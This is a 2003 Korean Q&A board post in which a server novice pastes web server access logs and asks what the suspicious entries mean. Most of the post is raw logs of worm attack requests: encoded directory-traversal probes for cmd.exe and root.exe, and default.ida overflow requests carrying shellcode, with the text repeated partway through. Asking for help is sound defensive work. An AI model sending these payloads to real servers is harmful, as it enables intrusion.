묻고답하기
서버에 서짜도 모르는 사람인데 -_-자꾸 이상한 로그가 남습니다;;
2003.04.25 21:53
기본적인 옵션 -_-으로 설치하였습니다....
근데 자꾸 이상 한 기록이 남네요-_-;;
써버만 돌리면 백신에서 어떤 파일이 문제 있다고 나오구 --;;
우선 로그들은 ... 접속로그는;;
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
이런거등
220.83.120.55 - - [25/Apr/2003:19:43:31 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 273
<--이런거 상당히 많음;;
220.83.224.198 - - [24/Apr/2003:19:04:05 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278
220.83.224.198 - - [24/Apr/2003:19:04:06 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
220.83.224.198 - - [24/Apr/2003:19:04:06 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.224.198 - - [24/Apr/2003:19:04:06 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.224.198 - - [24/Apr/2003:19:04:06 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.224.198 - - [24/Apr/2003:19:04:06 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.224.198 - - [24/Apr/2003:19:04:06 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.224.198 - - [24/Apr/2003:19:04:07 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
220.83.224.198 - - [24/Apr/2003:19:04:07 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [24/Apr/2003:19:04:07 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [24/Apr/2003:19:04:07 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [24/Apr/2003:19:04:07 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [24/Apr/2003:19:04:08 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.224.198 - - [24/Apr/2003:19:04:08 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.224.198 - - [24/Apr/2003:19:04:08 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.224.198 - - [24/Apr/2003:19:04:09 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.49.128 - - [24/Apr/2003:19:15:17 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278
220.83.49.128 - - [24/Apr/2003:19:15:17 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
220.83.49.128 - - [24/Apr/2003:19:15:17 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.49.128 - - [24/Apr/2003:19:15:18 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.49.128 - - [24/Apr/2003:19:15:18 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.49.128 - - [24/Apr/2003:19:15:18 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.49.128 - - [24/Apr/2003:19:15:18 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.49.128 - - [24/Apr/2003:19:15:18 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
220.83.49.128 - - [24/Apr/2003:19:15:18 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.49.128 - - [24/Apr/2003:19:15:21 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.49.128 - - [24/Apr/2003:19:15:21 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.49.128 - - [24/Apr/2003:19:15:21 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.49.128 - - [24/Apr/2003:19:15:21 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.49.128 - - [24/Apr/2003:19:15:21 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.49.128 - - [24/Apr/2003:19:15:21 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.49.128 - - [24/Apr/2003:19:15:21 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
이런거 아랬거처럼 이런접속을 하면 어떤결과이나요?
220.83.193.53 - - [24/Apr/2003:19:17:15 +0900] "GET /bbs/admin_setup.php?exec=view_group&group_no=1 HTTP/1.1" 200 10911
220.83.193.53 - - [24/Apr/2003:19:17:18 +0900] "GET /bbs/admin_setup.php?exec=view_board&exec2=add&group_no=1 HTTP/1.1" 200 20813
220.83.193.53 - - [24/Apr/2003:19:17:30 +0900] "POST /bbs/admin_setup.php HTTP/1.1" 200 122
220.83.193.53 - - [24/Apr/2003:19:17:31 +0900] "GET /bbs/admin_setup.php?exec=view_board&group_no=1&page=&page_num=10 HTTP/1.1" 200 10816
220.83.193.53 - - [24/Apr/2003:19:17:59 +0900] "GET /bbs/admin_setup.php?exec=view_board&group_no=1&page=&page_num=10 HTTP/1.1" 200 3866
220.83.193.53 - - [24/Apr/2003:19:17:59 +0900] "GET /bbs/admin_setup.php?exec=view_board&group_no=1&page=&page_num=10 HTTP/1.1" 200 10816
또이런거네요 ㅡㅡ
220.83.224.198 - - [24/Apr/2003:19:25:14 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278
220.83.224.198 - - [24/Apr/2003:19:25:15 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
220.83.224.198 - - [24/Apr/2003:19:25:16 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.224.198 - - [24/Apr/2003:19:25:16 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.224.198 - - [24/Apr/2003:19:25:17 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.224.198 - - [24/Apr/2003:19:25:17 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.224.198 - - [24/Apr/2003:19:25:18 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.224.198 - - [24/Apr/2003:19:25:19 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
220.83.224.198 - - [24/Apr/2003:19:25:19 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [24/Apr/2003:19:25:20 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [24/Apr/2003:19:25:21 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [24/Apr/2003:19:25:22 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [24/Apr/2003:19:25:23 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.224.198 - - [24/Apr/2003:19:25:24 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.224.198 - - [24/Apr/2003:19:25:25 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.224.198 - - [24/Apr/2003:19:25:25 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
이건 또먼지 ---;;; 황당한것들이 만네요
220.83.181.176 - - [24/Apr/2003:19:49:19 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 273
220.83.181.176 - - [24/Apr/2003:19:54:00 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 273
다시 이런것들 ㅡ.ㅡ
220.83.49.129 - - [24/Apr/2003:20:32:38 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
이런거 여러개 있지만 이제부터 표시 안할께요 ㅡㅡ
220.83.181.176 - - [24/Apr/2003:20:41:59 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 273
다시 요넘 -_- 수시로 들어오는넘이네요 ㅡㅡ
220.83.224.198 - - [25/Apr/2003:19:54:59 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278
220.83.224.198 - - [25/Apr/2003:19:54:59 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
220.83.224.198 - - [25/Apr/2003:19:54:59 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.224.198 - - [25/Apr/2003:19:54:59 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.224.198 - - [25/Apr/2003:20:08:24 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.224.198 - - [25/Apr/2003:20:08:24 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.224.198 - - [25/Apr/2003:20:08:24 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
이런식으로도해킹 가능한걸까요? --- 상당히 의심스러운 로그인데 먼말인지 몰라서 올립니다;;;
근데 자꾸 이상 한 기록이 남네요-_-;;
써버만 돌리면 백신에서 어떤 파일이 문제 있다고 나오구 --;;
우선 로그들은 ... 접속로그는;;
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
이런거등
220.83.120.55 - - [25/Apr/2003:19:43:31 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 273
<--이런거 상당히 많음;;
220.83.224.198 - - [24/Apr/2003:19:04:05 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278
220.83.224.198 - - [24/Apr/2003:19:04:06 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
220.83.224.198 - - [24/Apr/2003:19:04:06 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.224.198 - - [24/Apr/2003:19:04:06 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.224.198 - - [24/Apr/2003:19:04:06 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.224.198 - - [24/Apr/2003:19:04:06 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.224.198 - - [24/Apr/2003:19:04:06 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.224.198 - - [24/Apr/2003:19:04:07 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
220.83.224.198 - - [24/Apr/2003:19:04:07 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [24/Apr/2003:19:04:07 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [24/Apr/2003:19:04:07 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [24/Apr/2003:19:04:07 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [24/Apr/2003:19:04:08 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.224.198 - - [24/Apr/2003:19:04:08 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.224.198 - - [24/Apr/2003:19:04:08 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.224.198 - - [24/Apr/2003:19:04:09 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.49.128 - - [24/Apr/2003:19:15:17 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278
220.83.49.128 - - [24/Apr/2003:19:15:17 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
220.83.49.128 - - [24/Apr/2003:19:15:17 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.49.128 - - [24/Apr/2003:19:15:18 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.49.128 - - [24/Apr/2003:19:15:18 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.49.128 - - [24/Apr/2003:19:15:18 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.49.128 - - [24/Apr/2003:19:15:18 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.49.128 - - [24/Apr/2003:19:15:18 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
220.83.49.128 - - [24/Apr/2003:19:15:18 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.49.128 - - [24/Apr/2003:19:15:21 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.49.128 - - [24/Apr/2003:19:15:21 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.49.128 - - [24/Apr/2003:19:15:21 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.49.128 - - [24/Apr/2003:19:15:21 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.49.128 - - [24/Apr/2003:19:15:21 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.49.128 - - [24/Apr/2003:19:15:21 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.49.128 - - [24/Apr/2003:19:15:21 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
이런거 아랬거처럼 이런접속을 하면 어떤결과이나요?
220.83.193.53 - - [24/Apr/2003:19:17:15 +0900] "GET /bbs/admin_setup.php?exec=view_group&group_no=1 HTTP/1.1" 200 10911
220.83.193.53 - - [24/Apr/2003:19:17:18 +0900] "GET /bbs/admin_setup.php?exec=view_board&exec2=add&group_no=1 HTTP/1.1" 200 20813
220.83.193.53 - - [24/Apr/2003:19:17:30 +0900] "POST /bbs/admin_setup.php HTTP/1.1" 200 122
220.83.193.53 - - [24/Apr/2003:19:17:31 +0900] "GET /bbs/admin_setup.php?exec=view_board&group_no=1&page=&page_num=10 HTTP/1.1" 200 10816
220.83.193.53 - - [24/Apr/2003:19:17:59 +0900] "GET /bbs/admin_setup.php?exec=view_board&group_no=1&page=&page_num=10 HTTP/1.1" 200 3866
220.83.193.53 - - [24/Apr/2003:19:17:59 +0900] "GET /bbs/admin_setup.php?exec=view_board&group_no=1&page=&page_num=10 HTTP/1.1" 200 10816
또이런거네요 ㅡㅡ
220.83.224.198 - - [24/Apr/2003:19:25:14 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278
220.83.224.198 - - [24/Apr/2003:19:25:15 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
220.83.224.198 - - [24/Apr/2003:19:25:16 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.224.198 - - [24/Apr/2003:19:25:16 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.224.198 - - [24/Apr/2003:19:25:17 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.224.198 - - [24/Apr/2003:19:25:17 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.224.198 - - [24/Apr/2003:19:25:18 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.224.198 - - [24/Apr/2003:19:25:19 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
220.83.224.198 - - [24/Apr/2003:19:25:19 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [24/Apr/2003:19:25:20 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [24/Apr/2003:19:25:21 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [24/Apr/2003:19:25:22 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [24/Apr/2003:19:25:23 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.224.198 - - [24/Apr/2003:19:25:24 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.224.198 - - [24/Apr/2003:19:25:25 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.224.198 - - [24/Apr/2003:19:25:25 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
